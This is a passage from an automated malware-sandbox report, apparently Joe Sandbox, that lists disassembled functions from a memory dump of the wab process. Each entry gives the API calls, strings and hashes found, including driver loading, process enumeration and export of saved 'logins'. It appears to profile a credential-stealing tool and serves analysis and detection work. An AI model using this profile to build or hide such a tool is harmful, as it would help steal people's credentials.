                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                    • API String ID: 667068680-2887671607
                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                    • API String ID: 1607361635-601624466
                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _snwprintf$memset$wcscpy
                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                    • API String ID: 2000436516-3842416460
                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                    APIs
                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                    • String ID:
                                    • API String ID: 1043902810-0
                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                    APIs
                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                    • memset.MSVCRT ref: 0040E380
                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                    • wcschr.MSVCRT ref: 0040E3B8
                                    • memcpy.MSVCRT ref: 0040E3EC
                                    • memcpy.MSVCRT ref: 0040E407
                                    • memcpy.MSVCRT ref: 0040E422
                                    • memcpy.MSVCRT ref: 0040E43D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                    • API String ID: 3073804840-2252543386
                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@??3@_snwprintfwcscpy
                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                    • API String ID: 2899246560-1542517562
                                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                    APIs
                                    • memset.MSVCRT ref: 0040DBCD
                                    • memset.MSVCRT ref: 0040DBE9
                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                    • wcscpy.MSVCRT ref: 0040DC2D
                                    • wcscpy.MSVCRT ref: 0040DC3C
                                    • wcscpy.MSVCRT ref: 0040DC4C
                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                    • wcscpy.MSVCRT ref: 0040DCC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                    • API String ID: 3330709923-517860148
                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                    APIs
                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                    • memset.MSVCRT ref: 0040806A
                                    • memset.MSVCRT ref: 0040807F
                                    • _wtoi.MSVCRT ref: 004081AF
                                    • _wcsicmp.MSVCRT ref: 004081C3
                                    • memset.MSVCRT ref: 004081E4
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                    • String ID: logins$null
                                    • API String ID: 3492182834-2163367763
                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                    APIs
                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                    • memset.MSVCRT ref: 004085CF
                                    • memset.MSVCRT ref: 004085F1
                                    • memset.MSVCRT ref: 00408606
                                    • strcmp.MSVCRT ref: 00408645
                                    • _mbscpy.MSVCRT ref: 004086DB
                                    • _mbscpy.MSVCRT ref: 004086FA
                                    • memset.MSVCRT ref: 0040870E
                                    • strcmp.MSVCRT ref: 0040876B
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                    • String ID: ---
                                    • API String ID: 3437578500-2854292027
                                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                    APIs
                                    • memset.MSVCRT ref: 0041087D
                                    • memset.MSVCRT ref: 00410892
                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                    • DeleteObject.GDI32(?), ref: 004109D0
                                    • DeleteObject.GDI32(?), ref: 004109D6
                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                    • String ID:
                                    • API String ID: 1010922700-0
                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                    APIs
                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                    • malloc.MSVCRT ref: 004186B7
                                    • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                    • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                    • malloc.MSVCRT ref: 004186FE
                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@$FullNamePath$malloc$Version
                                    • String ID: |A
                                    • API String ID: 4233704886-1717621600
                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                    • API String ID: 2081463915-1959339147
                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                    APIs
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                    • API String ID: 2012295524-70141382
                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                    APIs
                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                    • API String ID: 667068680-3953557276
                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                    APIs
                                    • GetDC.USER32(00000000), ref: 004121FF
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                    • SelectObject.GDI32(?,?), ref: 00412251
                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                    • SetCursor.USER32(00000000), ref: 004122BC
                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                    • memcpy.MSVCRT ref: 0041234D
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                    • String ID:
                                    • API String ID: 1700100422-0
                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                    • String ID:
                                    • API String ID: 552707033-0
                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                    • memcpy.MSVCRT ref: 0040C11B
                                    • strchr.MSVCRT ref: 0040C140
                                    • strchr.MSVCRT ref: 0040C151
                                    • _strlwr.MSVCRT ref: 0040C15F
                                    • memset.MSVCRT ref: 0040C17A
                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                    • String ID: 4$h
                                    • API String ID: 4066021378-1856150674
                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
